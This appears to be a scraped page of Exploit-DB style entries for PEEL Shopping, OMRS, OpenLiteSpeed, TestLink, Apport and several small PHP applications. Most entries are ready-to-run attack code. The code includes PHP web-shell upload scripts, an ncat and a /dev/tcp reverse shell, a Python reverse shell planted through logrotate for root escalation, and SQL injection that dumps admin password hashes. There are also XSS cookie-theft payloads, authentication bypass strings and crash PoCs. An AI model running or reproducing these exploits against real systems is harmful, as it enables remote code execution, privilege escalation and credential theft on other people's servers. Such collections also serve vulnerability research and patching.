HireHackking

# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Anmol K Sachan # Vendor Homepage: https://www.peel.fr/ # Software Link: https://sourceforge.net/projects/peel-shopping/ # Software: : PEEL SHOPPING 9.3.0 # Vulnerability Type: Stored Cross-site Scripting # Vulnerability: Stored XSS # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php # Vulnerable parameters: 'Address' # Payload used: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e # POC: in the same page where we injected payload click on the text box to edit the address. # You will see your Javascript code (XSS) executed.

# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) # Date: 10/02/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Xampp Server and Wamp Server # Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file # Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' # Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 import os import sys import random import argparse import requests def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration') parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration') my_args = parser.parse_args() return my_args def login(url, mobile, password): url = "%s/user/login.php"%(url) payload = {'mobno':mobile, 'password':password, 'login':''} req = requests.post(url, data=payload) return req.cookies['PHPSESSID'] def upload(url, cookie, file=None): url = "%s/user/marriage-reg-form.php"%url files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''} req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files) print('[+] PHP shell uploaded') def get_remote_php_files(url): url = "%s/user/images"%(url) req = requests.get(url) php_files = [] for i in req.text.split(".php"): php_files.append(i[-42:]) return php_files def exec_command(url, webshell, command): url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command) req = requests.get(url_r) print("[+] Command output\n%s"%(req.text)) def register(mobile, password, url): url_r = "%s/user/signup.php"%(url) data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""} req = requests.post(url_r, data=data) print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password)) if __name__ == "__main__": args = get_args() url = args.url command = args.command mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile password = "dante123" if args.password is None else args.password if args.password is None or args.mobile is None: register(mobile,password,url) cookie = login(url, mobile, password) initial_php_files = get_remote_php_files(url) upload(url, cookie) final_php_files = get_remote_php_files(url) webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php") exec_command(url,webshell,command)

# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) # Date: 26/1/2021 # Exploit Author: Metin Yunus Kandemir # Discovered by: cmOs - SunCSR # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.8 import requests import sys import urllib3 from bs4 import BeautifulSoup """ Description: The "path" parameter has command injection vulnerability that leads to escalate privilege. OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc. Details: https://github.com/litespeedtech/openlitespeed/issues/217 Example: Step-1: ubuntu@ubuntu:~$ cat /etc/shadow cat: /etc/shadow: Permission denied Step-2: ubuntu@ubuntu:~$ nc -nvlp 4444 Listening on [0.0.0.0] (family 0, port 4444) Step-3: ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow [+] Authentication was successful! [+] Version is detected: OpenLiteSpeed 1.7.8 [+] The target is vulnerable! [+] tk value is obtained: 0.98296300 1612966522 [+] Sending reverse shell to 127.0.0.1:4444 ... [+] Triggering command execution... Step-4: ubuntu@ubuntu:~$ nc -nvlp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 127.0.0.1 54534 received! cat /etc/shadow root:!:18620:0:99999:7::: daemon:*:17937:0:99999:7::: bin:*:17937:0:99999:7::: sys:*:17937:0:99999:7::: sync:*:17937:0:99999:7::: . . . """ def triggerCommandExec(target, s): data = {"act" : "restart"} trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False) if trigger.status_code == 200: print("[+] Triggering command execution...") else: print("[-] Someting went wrong!") def commandExec(tk, groupId, s, target): data = { "name" : "lsphp", "address" : "uds://tmp/lshttpd/lsphp.sock", "note" : "", "maxConns" : "10", "env" : "PHP_LSAPI_CHILDREN=10", "initTimeout" : "60", "retryTimeout" : "0", "persistConn" : "1", "pcKeepAliveTimeout" : "", "respBuffer" : "0", "autoStart" : "2", "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash", "backlog" : "100", "instances" : "1", "extUser" : "root", "extGroup" : groupId , "umask" : "", "runOnStartUp" : "1", "extMaxIdleTime" : "", "priority" : "0", "memSoftLimit" : "2047M", "memHardLimit" : "2047M", "procSoftLimit" : "1400", "procHardLimit" : "", "a" : "s", "m" : "serv", "p" : "ext", "t" : "A_EXT_LSAPI", "r" : "lsphp", "tk" : tk } exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False) if exec.status_code == 200: if exec.text == "Illegal entry point!": print("[-] tk value is incorrect!") sys.exit(1) else: print("[+] Sending reverse shell to 127.0.0.1:4444 ...") else: print("[-] Something went wrong!") sys.exit(1) triggerCommandExec(target, s) def loginReq(target, username, password, groupId): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() data = {"userid" : username , "pass" : password } login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False) if login.status_code == 302: print("[+] Authentication was successful!") elif login.status_code == 200: print("[-] Authentication was unsuccessful!") sys.exit(1) else: print("[-] Connection error!") sys.exit(1) version = s.get("https://" + target + "/index.php") versionSource = BeautifulSoup(version.text, "html.parser") v = versionSource.find('div', {'class':'project-context hidden-xs'}).text print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2])) if v.split()[2] == "1.7.8": print("[+] The target is vulnerable!") #getting tk value getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext") source = BeautifulSoup(getTk.text, 'html.parser') tk = source.find('input', {'name':'tk'}).get('value') print("[+] tk value is obtained: "+tk) commandExec(tk, groupId, s, target) def main(args): if len(args) != 5: print("usage: %s targetIp:port username password groupId " %(args[0])) print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow") sys.exit(1) loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4]) if __name__ == "__main__": main(args=sys.argv)

# Exploit Title: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 02-11-2020 # Vendor Homepage: https://www.pdfcomplete.com/cms/dpl/tabid/111/Default.aspx?r=du2vH8r # Software Links : https://pdf-complete.informer.com/download/ # Tested Version: 4.1.45 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ PDF Document Manager pdfcDispatcher C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService Auto C:\>sc qc pdfcDispatcher [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: pdfcDispatcher TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PDF Document Manager DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html # Software: School Event Attendance Monitoring System 1.0 # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable Page: http://localhost/attendance/sanction # Vulnerable functionality: 'Add Sanction ' # Vulnerable Input Field : Item Name # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/attendance/sanction) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html # Software: : School File Management System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php # Vulnerable functionality: 'Update Account' # Vulnerable Input Field : {Firtstname} {Lastname} # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/School%20File%20Management%20System/student_profile.php) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated) # Date: 14th February 2021 # Exploit Author: snovvcrash # Original Research by: Ackcent AppSec Team # Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/ # Vendor Homepage: https://testlink.org/ # Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code # Version: 1.9.20 # Tested on: Ubuntu 20.10 # CVE: CVE-2020-8639 # Requirements: pip3 install -U requests bs4 # Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink """ Raw exploit request: POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067 Content-Length: 1187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1 Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f Upgrade-Insecure-Requests: 1 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="CSRFName" CSRFGuard_1115715115 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="CSRFToken" 506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="importType" /../../../logs/pwn.php -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="MAX_FILE_SIZE" 409600 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml" Content-Type: application/xml <?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?> -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="tproject_id" 1 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="UploadFile" Upload file -----------------------------242818621515179709592867995067-- """ #!/usr/bin/env python3 import re from urllib import parse from cmd import Cmd from base64 import b64encode from argparse import ArgumentParser import requests from bs4 import BeautifulSoup parser = ArgumentParser() parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"') parser.add_argument('-u', '--username', default='admin', help='TestLink username') parser.add_argument('-p', '--password', default='admin', help='TestLink password') parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format <HOST:PORT>, ex. "127.0.0.1:8080"') args = parser.parse_args() class TestLinkWebShell(Cmd): payloadPHP = """<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>""" uploadPath = 'logs/pwn.php' prompt = '$ ' def __init__(self, target, username, password, proxies): super().__init__() self.target = target self.username = username self.password = password if proxies: self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'} else: self.proxies = None self.session = requests.Session() self.session.verify = False resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies) soup = BeautifulSoup(resp.text, 'html.parser') self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value') self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value') self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value') self.destination = soup.find('input', {'name': 'destination'}).get('value') def auth(self): data = { 'CSRFName': self.csrf_name, 'CSRFToken': self.csrf_token, 'reqURI': self.req_uri, 'destination': self.destination, 'tl_login': self.username, 'tl_password': self.password } resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies) if resp.status_code == 200: print('[*] Authentication succeeded') resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies) if resp.status_code == 200: print('[*] Loaded mainPage.php iframe contents') soup = BeautifulSoup(resp.text, 'html.parser') self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href') self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0] print(f'[+] Extracted tproject_id value: {self.tproject_id}') else: raise Exception('Error loading mainPage.php iframe contents') else: raise Exception('Authentication failed') def upload_web_shell(self): files = [ ('CSRFName', (None, self.csrf_name)), ('CSRFToken', (None, self.csrf_token)), ('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')), ('MAX_FILE_SIZE', (None, '409600')), ('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)), ('tproject_id', (None, self.tproject_id)), ('UploadFile', (None, 'Upload file')) ] resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies) if resp.status_code == 200: print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}') print('[*] Trying to query whoami...') resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies) if resp.status_code == 200: print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}') else: raise Exception('Error interacting with the web shell') else: raise Exception('Error uploading web shell') def emptyline(self): pass def preloop(self): self.auth() self.upload_web_shell() def default(self, args): try: resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies) if resp.status_code == 200: print(resp.text.strip()) except Exception as e: print(f'*** Something weired happened: {e}') def do_spawn(self, args): """Spawn a reverse shell. Usage: \"spawn <LHOST> <LPORT>\".""" try: lhost, lport = args.split() payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' b64_payload = b64encode(payload.encode()).decode() cmd = f'echo {b64_payload} | base64 -d | /bin/bash' self.default(cmd) except Exception as e: print(f'*** Something weired happened: {e}') def do_EOF(self, args): """Use Ctrl-D to exit the shell.""" print(); return True if __name__ == '__main__': tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy) tlws.cmdloop('Type help for list of commands')

# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection # Date: 13/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html # Version:1.0 # Tested on: latest version of Chrome, Firefox on Windows and Linux --------------------------Proof of Concept----------------------- 1. Navigate to http://host/trms/ 2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL injection 3. Below curl request will display the admin username and password hash ------------------------Exploit request----------------------------- curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://192.168.1.13/trms/' -H $'Cookie: PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \ --data-binary $'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search=' \ $'http://host/trms/search-teacher.php'

# Exploit Title: Tasks 9.7.3 - Insecure Permissions # Date: 18th of July, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ # Vendor Homepage: https://tasks.org/ # Software Link: https://github.com/tasks/tasks # Version: 9.7.3 # Tested on: Android 9 Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. A malicious application has several ways of how to achieve that: 1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list. 2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list. We used the Drozer application to emulate malicious app activity. Please find the commands below. run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa" run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"

# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS) # Date: 16-02-2021 # Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited # Vendor Homepage: https://blackcat-cms.org/ # Software Link: https://blackcat-cms.org/page/download.php # Version: BlackCat CMS - 1.3.6 # Tested on: Windows # Steps to Reproduce: 1. To exploit this vulnerability an attacker has a login in the admin panel and clicks on the admin profile button. Then use " onmouseover=alert(1) " this XSS payload on Display name field and click on the Save button. 2 .Then refresh the page and hover the mouse on Display name filed and our XSS message pop up.

# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass # Date: 16-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. # --- Proof of concept --- # Curl request for authentication bypass via sql injection in parameter 'email': curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="

# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: http://agatasoft.com/ # Software Link: http://agatasoft.com/Ping_Master_Pro.exe # Version: 2.1 # Tested on: Windows 10 Home x64 #STEPS # Open the program AgataSoft PingMaster Pro # In Tools select the option Trace Route # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field Host name and click in Get IP from host name # End :) buffer = 'S' * 10000 try: file = open("Gou.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://switchportmapper.com/ # Software Link: https://switchportmapper.com/download.htm # Version: 2.85.2 # Tested on: Windows 10 Home x64 #STEPS # Open the program Managed Switch Port Mapping Tool # In the left side select Settings from Router/Srvr 1 (for layer 2 Switches) # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field IP Address and SNMP v1/v2c Read Community Name # Click in OK # End :) buffer = 'F' * 10000 try: file = open("Gou2.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://www.nsauditor.com/ # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Version: 3.2.2.0 # Tested on: Windows 10 Home x64 #STEPS # Open the program Nsauditor # In Options select Configuration... # Click in Security Events # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Liella.txt" # Paste the content in the field Event Description and click in Add Event # End :) buffer = 'U' * 10000 try: file = open("Liella.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-16 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html # Software: Billing Management System 2.0 # Vulnerability Type: SQL injection - Auth Bypass # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection vulnerability. # Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php # Payload used: Username => admin' or '1'='1 Password => admin' or '1'='1 # POC: Whenever we will go to the page (http://localhost/smartbilling/smartbilling_source_code/index.php) when we inject SQL Payload then we will directly enter into the admin page.

# Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html # Software: Faulty Evaluation System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/evaluation/student/list # Vulnerable functionality: 'Student' # Vulnerable Input Field : {Firtstname} {Lastname} {Middle Name} # Payload used: <a onmouseover="alert(document.cookie)">xxs link</a> # POC: Whenever we will go to the page ( http://localhost/evaluation/student/list) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: Apport 2.20 - Local Privilege Escalation # Date: 18/02/21 # Exploit Author: Gr33nh4t # Vendor Homepage: https://ubuntu.com/ # Version: Apport: Ubuntu 20.10 - Before 2.20.11-0ubuntu50.5 Apport: Ubuntu 20.04 - Before 2.20.11-0ubuntu27.16 Apport: Ubuntu 18.04 - Before 2.20.9-0ubuntu7.23 Apport: Ubuntu 16.04 - Before 2.20.1-0ubuntu2.30 # Tested on: Ubuntu This is a POC for Apport exploit, we exploited these bugs by launching a reverse shell to 127.0.0.1:1234. # Setup To compile the exploit code several packages are needed: sudo apt-get install build-essential nasm gcc # Compilation make # Run ./exploit.sh The reverse shell will connect on the next execution of logrotate nc -l -p 1234 ## Makefile ## .PHONY: all clean CC=gcc CFLAGS= NASM=nasm NASM_FLAGS=-f elf64 LD=ld all: exploit crash decoy exploit: exploit.c $(CC) -o $@ $< $(CFLAGS) chmod +x $@ crash: crash.o $(LD) $^ -o $@ decoy: decoy.o $(LD) $^ -o $@ crash.o: crash.asm $(NASM) $(NASM_FLAGS) $^ decoy.o: decoy.asm $(NASM) $(NASM_FLAGS) $^ clean: rm exploit decoy crash *.o ## crash.asm ## section .data message db 10,"/var/crash/test.log{",10," su root root",10," daily",10," size=0",10," firstaction",10," python3 -c ", 34, "import sys,socket,os,pty; s=socket.socket();s.connect(('127.0.0.1', 1234));[os.dup2(s.fileno(), fd) for fd in (0,1,2)];pty.spawn('/bin/sh')", 34, ";",10," endscript",10,"}",10, 00 timeval: tv_sec dd 0 tv_usec dd 0 section .text global _start _start: mov dword [tv_sec], 4000000 mov dword [tv_usec], 0 mov rax, 35 mov rdi, timeval mov rsi, 0 syscall ## decoy.asm ## section .text global _start _start: mov dword [0], 0 ## exploit.c ## #include <unistd.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define PID_THRESHOLD (80) int read_max_pid_file() { FILE *fd = 0; char buf[256]; fd = fopen("/proc/sys/kernel/pid_max", "r"); fread(buf, sizeof(buf), 1, fd); fclose(fd); return atoi(buf); } void write_to_fifo_file(char * path) { FILE *fd = 0; char buf[] = "A"; fd = fopen(path, "w"); fwrite(buf, sizeof(buf), 1, fd); fclose(fd); return; } int main(int argc, char *argv[]) { int iteration = 0; pid_t crash_pid = -1, temp_pid = -1, spray_pid = -1; int current_pid = 0, max_pid = 0; int total_pid = 0; char *crash_argv[] = {"crash", NULL}; char *sudo_argv[] = {"sudo", "-S", "sud", NULL}; char current_dir[1024] = {0}; char exec_buf[2048] = {0}; char crash_buf[2048] = {0}; struct stat sb = {0} ; int null_fd = -1; signal(SIGCHLD, SIG_IGN); getcwd(current_dir, sizeof(current_dir)); snprintf(exec_buf, sizeof(exec_buf), "%s/%s", current_dir, "a\rUid: 0\rGid: 0"); snprintf(crash_buf, sizeof(crash_buf), "%s/%s", current_dir, "crash"); chdir("/etc/logrotate.d/"); // Creating the crash program if (0 == stat(crash_buf, &sb) && sb.st_mode & S_IXUSR) { crash_pid = fork(); if (0 == crash_pid) { execve(crash_buf, crash_argv, NULL); exit(0); } else if(-1 == crash_pid) { printf("[-] Could not fork program\n"); return -1; } } else { printf("[-] Please check crash file executable."); return -1; } max_pid = read_max_pid_file(); printf("[*] crash pid: %d\n", crash_pid); printf("[*] max pid: %d\n", max_pid); printf("[*] Creating ~%d PIDs\n", max_pid); printf("[*] Forking new processes\n"); sleep(3); // Iterating through max_pid to almost reach the crash program pid while (iteration < max_pid - 1) { // Print progress of forks if( 0 == (iteration % (int)(max_pid / 5000))) { printf("\rIteration: %d/%d", iteration + 1, max_pid); fflush(stdout); } temp_pid = -1; temp_pid = fork(); if (0 == temp_pid) { exit(0); } else if (temp_pid > 0) { iteration++; // We should stop before the crash pid to avoid other processes created meanwhile to interfere the exploit process if ( temp_pid < crash_pid && crash_pid - temp_pid < PID_THRESHOLD) { printf("\rIteration: %d/%d\n", iteration + 1, max_pid); fflush(stdout); printf("[+] less then %d pid from the target: last fork=%d , target: %d\n", PID_THRESHOLD, temp_pid, crash_pid); break; } } else if (-1 == temp_pid) { printf("[-] Could not fork temp programs\n"); } } printf("[*] Crashing the crash program\n"); kill(crash_pid, SIGSEGV); // From Now on the seconds apport will launch and we have 30 seconds to exploit it sleep(5); printf("[*] Killing the crash program\n"); kill(crash_pid, SIGKILL); sleep(3); // Now crash pid is free and we need to occupy it for(int i=0; i < PID_THRESHOLD ; i++) { spray_pid = fork(); if (0 == spray_pid) { if (crash_pid == getpid()) { null_fd = open("/dev/null", O_WRONLY); dup2(null_fd, 1); dup2(null_fd, 2); close(null_fd); printf("[+] Creating suid process\n"); execve(exec_buf, sudo_argv, NULL); } exit(0); } } sleep(3); printf("[*] Writing to fifo file\n"); write_to_fifo_file(argv[1]); // Now the first apport released and the second apport resumed printf("[+] Wrote core file to cwd!\n"); sleep(10); // Waiting for the second apport to finish execution return 0; } ## exploit.sh ## #!/bin/sh set -e echo "[*] Running exploit" touch /var/crash/test.log ulimit -c unlimited if [ ! -d "~/.config/apport" ]; then echo "[*] Settings directory not exists" echo "[*] Creating settings directory" mkdir -p ~/.config/apport fi if [ ! -f "~/.config/apport/settings" ] ; then echo "[*] Settings file not exists" echo "[main]\nunpackaged=true\n" > ~/.config/apport/settings echo "[+] Settings file created" fi DECOY_PATH=`realpath ./decoy` MY_UID=`id -u` DECOY_CRASH_NAME=`echo "${DECOY_PATH}.${MY_UID}.crash" | sed 's/\//_/g'` DECOY_CRASH_PATH="/var/crash/${DECOY_CRASH_NAME}" if [ -f $DECOY_CRASH_PATH ] || [ -p $DECOY_CRASH_PATH ] ; then echo "[*] decoy crash exists deleting the file" rm $DECOY_CRASH_PATH fi mkfifo $DECOY_CRASH_PATH echo "[+] FIFO file created" ./decoy 2>&1 